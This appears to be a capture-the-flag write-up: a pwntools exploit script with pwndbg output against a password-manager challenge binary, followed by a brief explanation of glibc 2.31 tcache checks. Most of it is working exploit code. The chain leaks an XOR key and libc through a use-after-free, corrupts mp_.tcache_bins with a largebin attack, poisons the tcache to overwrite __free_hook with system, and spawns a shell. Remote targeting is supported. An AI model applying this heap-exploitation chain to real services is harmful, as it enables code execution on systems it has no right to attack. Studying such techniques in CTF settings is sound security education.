sla(b'Input Your Choice:\n', opt)

def add(box_idx, ID, pwd_len, pwd):

box_idx, ID, pwd_len= map(itoa, (box_idx, ID, pwd_len))

menu(1)

sla(b'Add:\n', box_idx)

sla(b'Save:', ID)

sla(b'Length Of Your Pwd:', pwd_len)

sla(b'Your Pwd:', pwd)

def free(box_idx):

menu(4)

sla(b'Idx you want 2 Delete:\n', itoa(box_idx))

def edit(box_idx, pl):

menu(2)

sla(b'Which PwdBox You Want Edit:\n', itoa(box_idx))

s(pl)

def show(box_idx):

menu(3)

sla(b'Which PwdBox You Want Check:\n', itoa(box_idx))

def recover(box_idx):

menu(5)

sla(b'Idx you want 2 Recover:\n', itoa(box_idx))

def exp():

"""

Main scanf:

.text:0000000000001B9C lea rdi, aC ; "%c"

.text:0000000000001BA3 mov eax, 0

.text:0000000000001BA8 call ___isoc99_scanf

Encrypt XOR:

.text:00000000000014AA mov rdx, cs:qword_4040

Show:

.text:000000000000192D lea rdi, aIdxDUsernameSP ; "IDX: %d\nUsername: %s\nPwd is: %s"

.text:0000000000001934 mov eax, 0

.text:0000000000001939 call _printf

...

.text:0000000000001972 call encrypt

.text:0000000000001977 jmp short loc_1988

.text:000000000000199C leave

.text:000000000000199D retn

"""

# g("""breakrva 0x199c""")

"""

Leak encrypt key

"""

add(0, 0, 0x460, b"aaaaaaaa")

ru(b'Save ID:')

leak = u64(r(8))

key = leak ^ u64(b"aaaaaaaa")

pa(key)

"""

UAF

leak libc - encrypted_fd ^ key

"""

add(1, 0, 0x450, p64(0xdeadbeefdeadbabe))

add(2, 0, 0x450, p64(0xdeadbeefdeadbabe))

free(0)

recover(0)

show(0)

ru(b"Pwd is: ")

leak = uu64(r(8)) ^ key

libc_base = leak - 0x1ecbe0

pa(libc_base)

"""

Attack mp_

pwndbg> ptype /o (struct malloc_par *) 0x7a4eeda65280

type = struct malloc_par {

/* 0 | 8 */ unsigned long trim_threshold;

/* 8 | 8 */ size_t top_pad;

/* 16 | 8 */ size_t mmap_threshold;

/* 24 | 8 */ size_t arena_test;

/* 32 | 8 */ size_t arena_max;

/* 40 | 4 */ int n_mmaps;

/* 44 | 4 */ int n_mmaps_max;

/* 48 | 4 */ int max_n_mmaps;

/* 52 | 4 */ int no_dyn_threshold;

/* 56 | 8 */ size_t mmapped_mem;

/* 64 | 8 */ size_t max_mmapped_mem;

/* 72 | 8 */ char *sbrk_base;

/* 80 | 8 */ size_t tcache_bins;

/* 88 | 8 */ size_t tcache_max_bytes;

/* 96 | 8 */ size_t tcache_count;

/* 104 | 8 */ size_t tcache_unsorted_limit;

/* total size (bytes): 112 */

} *

pwndbg> p (*(struct malloc_par *)0x7a4eeda65280).tcache_bins

$6 = 64

pwndbg> p &(*(struct malloc_par *)0x7a4eeda65280).tcache_bins

$7 = (size_t *) 0x7a4eeda652d0 <mp_+80>

pwndbg> libc

libc : 0x7a4eed879000

pwndbg> distance $7 0x7a4eed879000

0x7a4eeda652d0->0x7a4eed879000 is -0x1ec2d0 bytes (-0x3d85a words)

"""

mp_tcache_bins = libc_base + 0x1ec2d0

pa(mp_tcache_bins)

"""

main:

before loop

"""

# g("breakrva 0x1ba8")

"""

Largebin attack

Write a heap address value into mp_.tcache_bins

"""

add(3, 0, 0x600, b"aaaaaaaa") # 0 -> lbin

# 1st UAF write: largebin bk_nextsize ptr

pl = flat({

0x18: p64(mp_tcache_bins-0x20)

}, filler=b'\0')

edit(0, pl)

free(2) # 2 -> usbin

recover(2)

add(4, 0, 0x600, b"bbbbbbbb") # largebin attack: 2 -> lbin

"""

After largebin attack:

pwndbg> mp

{

trim_threshold = 131072,

top_pad = 131072,

mmap_threshold = 131072,

arena_test = 8,

arena_max = 0,

n_mmaps = 0,

n_mmaps_max = 65536,

max_n_mmaps = 0,

no_dyn_threshold = 0,

mmapped_mem = 0,

max_mmapped_mem = 0,

sbrk_base = 0x571d44620000 "",

tcache_bins = 95783212944224,

tcache_max_bytes = 1032,

tcache_count = 7,

tcache_unsorted_limit = 0

}

pwndbg> x 95783212944224

0x571d44620b60: 0x00000000

"""

"""

delete:

.text:00000000000019D3 mov eax, 0

.text:00000000000019D8 call ___isoc99_scanf

.text:00000000000019DD mov eax, [rbp+box_idx]

...

.text:0000000000001A16 mov rdi, rax ; ptr

.text:0000000000001A19 call _free

"""

# g("breakrva 0x1a19")

# pause()

"""

Tcachebin poisoning attack

"""

bin_sh = next(libc.search(b"/bin/sh\x00"))

system = libc_base + libc.sym.system

free_hook = libc_base + libc.sym.__free_hook

pa(free_hook)

pa(system)

free(1) # 1 -> tcachebin

free(2) # 2 -> tcachebin

# 2nd UAF write: tcachebin fd ptr

recover(2)

edit(2, p64(free_hook))

add(5, 0, 0x450, b"cccccccc")

add(6, 0, 0x450, b"cccccccc")

# Last allocated chunk is __free_hook

edit(6, p64(system))

edit(5, b"/bin/sh\0")

free(5)

p.interactive()

if __name__ == '__main__':

FILE_PATH = "./pwdPro"

LIBC_PATH = "./libc.so.6"

context(arch="amd64", os="linux", endian="little")

context.log_level = "debug"

context.terminal = ['tmux', 'splitw', '-h'] # ['<terminal_emulator>', '-e', ...]

e = ELF(FILE_PATH, checksec=False)

mode = {"local": False, "remote": False, }

env = None

print("Usage: python3 xpl.py [<ip> <port>]\n"

" - If no arguments are provided, runs in local mode (default).\n"

" - Provide <ip> and <port> to target a remote host.\n")

if len(sys.argv) == 3:

if LIBC_PATH:

libc = ELF(LIBC_PATH)

p = remote(sys.argv[1], int(sys.argv[2]))

mode["remote"] = True

remote_ip_addr = sys.argv[1]

remote_port = int(sys.argv[2])

elif len(sys.argv) == 1:

if LIBC_PATH:

libc = ELF(LIBC_PATH)

env = {

"LD_PRELOAD": os.path.abspath(LIBC_PATH),

"LD_LIBRARY_PATH": os.path.dirname(os.path.abspath(LIBC_PATH)),

}

p = process(FILE_PATH, env=env)

mode["local"] = True

else:

print("[-] Error: Invalid arguments provided.")

sys.exit(1)



exp()Pwned after we have successfully hijacked the __free_hook
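To see why the corrupted mp_.tcache_bins changes the fate of our 0x460 chunks, the check performed on free can be modelled as below. This is a simplified sketch of the Glibc 2.31 condition (index below mp_.tcache_bins and bin not full); it ignores the double-free key check, and the function names are illustrative.

```python
MINSIZE = 0x20
MALLOC_ALIGNMENT = 0x10
COUNTS_START = 0x10             # counts[] begins right after the chunk header
ENTRIES_START = 0x10 + 2 * 64   # 0x90: entries[] follows 64 uint16_t counters


def csize2tidx(chunk_size: int) -> int:
    """Python port of the csize2tidx macro."""
    return (chunk_size - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT


def free_uses_tcache(chunk_size: int, tcache_bins: int, count: int,
                     tcache_count: int = 7) -> bool:
    """Simplified gate: tidx < mp_.tcache_bins and counts[tidx] < mp_.tcache_count."""
    return csize2tidx(chunk_size) < tcache_bins and count < tcache_count


def count_slot_offset(tidx: int) -> int:
    """Offset from heap_base of the 2-byte counter that is read for this index."""
    return COUNTS_START + 2 * tidx


print(free_uses_tcache(0x460, 64, 0))               # default limit
print(free_uses_tcache(0x460, 0x571D44620B60, 0))   # heap address written by the attack
print(hex(count_slot_offset(csize2tidx(0x460))))
```

With an out-of-range index, the counter that gets read is no longer a real counter: for index 68 it falls at heap_base + 0x98, inside the entries array. The bin therefore only looks "not full" if those two bytes happen to hold a value below tcache_count, which is worth verifying in the debugger when adapting this technique to a different heap layout.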
